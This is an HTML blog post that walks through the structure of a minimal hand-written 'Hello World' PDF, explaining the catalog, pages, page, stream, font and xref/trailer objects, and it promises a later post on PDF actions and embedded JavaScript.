</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwVzTyjSO5HvMiyj-s-uuNwuasqC7L0AcUUaslXXi6SANguU3P_oq-fojwlraJzR9hVVdObIInnmzgINGLtRU-5BlTOREDUcVXggIab7X3hfwoThdTv240GIeCJhx51y5OkfWlXEhOaIx/s1600/Figure1-1.jpg" imageanchor="1"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwVzTyjSO5HvMiyj-s-uuNwuasqC7L0AcUUaslXXi6SANguU3P_oq-fojwlraJzR9hVVdObIInnmzgINGLtRU-5BlTOREDUcVXggIab7X3hfwoThdTv240GIeCJhx51y5OkfWlXEhOaIx/s400/Figure1-1.jpg" width="197" /></a></div><div class="MsoNoSpacing" style="text-indent: -24px;"><o:p><br />
</o:p></div><div class="MsoNoSpacing">Below is a simple example PDF I created with notepad. It prints out a “Hello World!” message centered at the top of the document. I will show the code and explain each section one by one.<o:p></o:p></div><div class="MsoNormal" style="text-indent: .5in;"><br />
</div><div class="MsoNormal" style="text-indent: .5in;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYhouAZyGBwRFhyrIGBfRAaQY-iX2OVawpEiI9Cu2PwKSN71r7j7J_xad97UrwEu_E3CeiOhWTKXxgeMfImxNByFKu-5IqXYZ7GiZdQ5nBO69-vR0T55nUc82Td-afEgPVBOI5pdwo56O7/s1600/Figure1-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYhouAZyGBwRFhyrIGBfRAaQY-iX2OVawpEiI9Cu2PwKSN71r7j7J_xad97UrwEu_E3CeiOhWTKXxgeMfImxNByFKu-5IqXYZ7GiZdQ5nBO69-vR0T55nUc82Td-afEgPVBOI5pdwo56O7/s1600/Figure1-2.JPG" /></a></div><div class="MsoNormal"><span style="height: 172px; margin-left: 430px; margin-top: 182px; position: absolute; width: 18px; z-index: 251649012;"> </span><o:p></o:p></div><div class="MsoNormal" style="text-indent: .5in;"><br />
</div><div class="MsoNoSpacing"><br />
The header section contains the version of the PDF specification that my file conforms to. In my example I use the version 1.0. Next is the first object which is a catalog object. If you think of a tree data structure the catalog object would be the root and all other elements grow or build onto this node.<o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7dbpZ2PxQuGIKdDCESOBPcl4z1HV4QAHGpf-PaZgpx_1-56Q1psf-l9wK7MIrq8LNCzYvSq2x2jlatb8LwdYxwmrnUT2PDiQU3_UY9zmq58PnJ9KDQ-NkGIa6LcC-88ZeqADYTsGgzpjp/s1600/Figure1-3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7dbpZ2PxQuGIKdDCESOBPcl4z1HV4QAHGpf-PaZgpx_1-56Q1psf-l9wK7MIrq8LNCzYvSq2x2jlatb8LwdYxwmrnUT2PDiQU3_UY9zmq58PnJ9KDQ-NkGIa6LcC-88ZeqADYTsGgzpjp/s1600/Figure1-3.JPG" /></a></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">Line 3 of the code specifies the object number is 1 and the generation is 0. Similar to the html language, the object must be enclosed with starting and closing tags. Line 3 you have an “obj” tag which specifies this is an object. On line 9 you have an “endobj” closing tag which identifies the end of the object. The double angle brackets on line 4 and 8 are necessary to enclose a dictionary object which is simply a pair of objects where the first element is a key and the second element is a value. Line 5 specifies the type of the object which is a “Catalog” object. Let us disregard line 6 for now and discuss it later when we attempt to describe actions to perform when opening a document or when we later explore inserting JavaScript into our PDF. Line 7 is a reference to a “Pages” object which will contain more references to individual “Page” objects. Here we list the object number of the “Pages” object which is 2 and generation which is 0. The “R” in the statement is a keyword that stands for reference.<o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIBkM36ngRyKMiDTxjSlbpJozwE3LWxqMEZFoLZkZVG8dt5EuVH-t05WrrvUCh-I3QrqoD9G-l22w8UeJJf9Vpzwnlh1IULtA_rG7SW9ndtgGbWbPGKxspQP3mdCorkukyz1W9qqRlbcOW/s1600/Figure1-4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIBkM36ngRyKMiDTxjSlbpJozwE3LWxqMEZFoLZkZVG8dt5EuVH-t05WrrvUCh-I3QrqoD9G-l22w8UeJJf9Vpzwnlh1IULtA_rG7SW9ndtgGbWbPGKxspQP3mdCorkukyz1W9qqRlbcOW/s1600/Figure1-4.JPG" /></a></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">Our second object is the “Pages” object which will contain references to individual pages. Be careful not to confuse the “Pages” object with the “Page” object. As you can see above, the type of this object is pages and we introduce a new entry called “Count”. Count refers to the number of pages that this current object points to. In this simple example we only have one page. Line 15 we specify a required keyword “Kids” which points to the object with the individual page object. The next object is our “Page” object and it is object number 3.<o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcQ2NtCMWjJhYwnmaOwQaqVZWIMxO3RAl2D-NoH32sktLh-NKUYWT7hmhdD5fdwq5iJ0Kzut5O6RDDX3ElVxJHsosB4QIjicG3io_K-RJyRVooWdpHAjrc8cBSz1c557X6xlmaMbO-dmT7/s1600/Figure1-5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcQ2NtCMWjJhYwnmaOwQaqVZWIMxO3RAl2D-NoH32sktLh-NKUYWT7hmhdD5fdwq5iJ0Kzut5O6RDDX3ElVxJHsosB4QIjicG3io_K-RJyRVooWdpHAjrc8cBSz1c557X6xlmaMbO-dmT7/s1600/Figure1-5.JPG" /></a></div><br />
<div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">Similar to the “Pages” object, the “Page” object also has to declare its type in line 21. In line 22 instead of kids you must list the parent of the object which in this case is object 2 (Pages). In Line 23 I list the resource I use for this object which the object font is necessary. Here I only declare a name for the font I will use and give a reference to a font object that fully declares the font type and size. In my example, my “Font” object is number 5. Line 25 I use the entry “MediaBox” and it is a required entry for a page object. It defines the boundaries of the page. The last entry I use for the Page object is “Contents” and this specifies a reference to an object that will contain our text we wish to display. In my example this is object 4 which is a stream object. <o:p></o:p></div><div class="MsoNoSpacing"><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyCSBFiBhA3cP4xkQ1eGw_3TG71a60lxpH5pmbwjSCmbBQXaaO2FI8lnkPmPDFnkAoh4mG6GWJvveNrjbNt20toY4IeKJQ8SInNqQzyMFSk1ljLIDMPmmoP-W6fOWA-aI7pKMSgIqT5w5D/s1600/Figure1-6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyCSBFiBhA3cP4xkQ1eGw_3TG71a60lxpH5pmbwjSCmbBQXaaO2FI8lnkPmPDFnkAoh4mG6GWJvveNrjbNt20toY4IeKJQ8SInNqQzyMFSk1ljLIDMPmmoP-W6fOWA-aI7pKMSgIqT5w5D/s1600/Figure1-6.JPG" /></a></div><o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">First in line 31 we must include the length and this is the byte size starting after stream to right before endstream. If we calculate the bytes we get the size to be 45. Next are the tags for the stream object. Line 32 is the start tag for stream and line 37 is the end tag for stream. Line 33 and 36 are opening and closing tags for text as well. “BT” stands for begin text, and “ET” stands for end text. Line 34 calls on our font which we declared as “F1” and the font size is set to 24. Something to note is how functions and parameters are called. The parameters of a function are pushed on the stack first, after the function is called and pops the parameters off. This is what is happening in line 34. The font “F1” and the size 24 are pushed on the stack. After the function “Tf” is pushed on the stack and pops the two parameters off the stack. On line 35, 250 and 700 is distance beginning from the bottom right side of the document. At this coordinate is where the text “Hello, World!” will be displayed. Additional if we desired we could add an optional filter to decode parameters if not in plain text. <o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCYKMtSFqTgrmb4_9oLSqcKr7oFVvyVspAL7ZVziESR3chSjVf717AvY899t94TRU0eLXaiZ7iykKkpbxfYr4JuKYUNAz5QcoUYdc0htxAlx3ts__0Ac0_XdxQDRCUIWsEf3D5G9hFz1p/s1600/Figure1-7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCYKMtSFqTgrmb4_9oLSqcKr7oFVvyVspAL7ZVziESR3chSjVf717AvY899t94TRU0eLXaiZ7iykKkpbxfYr4JuKYUNAz5QcoUYdc0htxAlx3ts__0Ac0_XdxQDRCUIWsEf3D5G9hFz1p/s1600/Figure1-7.JPG" /></a></div> <o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">Object number 5 is the font object that has been referenced beforehand. Here we fully declare the font object. We must first declare the type similar to the catalog and page objects. The type for this object is “Font”. Line 43 is a required entry in the font dictionary. There are seven subtypes that can be chosen and the different values can be found in the Portable Document Format Specification <a href="http://www.adobe.com/devnet/pdf_reference.html">[1]</a>. For our example I use “Type1”. The entry “BaseFont” on line 44 simply describes the font name we use which is Helvetica. <o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPqi4K-sRghIh4SVFrMQmFjKXwNxXvvXAFVW_bcFSB-Kq_582nl35tI7fo0E0_hZhDll5wJsruV-igmnbsUkzL2TnUceqlyjl9iPI44gq-NVU4pAn220qN61H2912rxQLsFS_jCxRfTQ5/s1600/Figure1-8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPqi4K-sRghIh4SVFrMQmFjKXwNxXvvXAFVW_bcFSB-Kq_582nl35tI7fo0E0_hZhDll5wJsruV-igmnbsUkzL2TnUceqlyjl9iPI44gq-NVU4pAn220qN61H2912rxQLsFS_jCxRfTQ5/s1600/Figure1-8.JPG" /></a></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">The last section that must be included to close a PDF document is the xref and trailer section. <o:p></o:p></div><div class="MsoNoSpacing">Line 49 specifies the number of object entries in the document including the xref object. The number of objects is 6 and it is again referenced inside the trailer section to indicate the size. Also in line 54 we have a reference to the catalog object (Object 1) which is the root node. We end with a closing startxref tag and an end of file tag on line 58. This completes the creation of a PDF and will be read by a PDF reader. Only the bare essentials are included in my example and normally in the cross reference table one would include the offsets for each object in the document. <o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">In the next article I will explore actions that are available in the PDF format as well as embedding JavaScript in a document.<o:p></o:p><br />
<br />
<br />
<div class="MsoNoSpacing"><span style="font-size: large;">References</span><o:p></o:p></div><div class="MsoNoSpacing">[1] “PDF Reference and Adobe Extensions to the PDF Specifications”, Available at <a href="http://www.adobe.com/devnet/pdf_reference.html">http://www.adobe.com/devnet/pdf_reference.html</a><o:p></o:p></div></div>Unknownnoreply@blogger.com14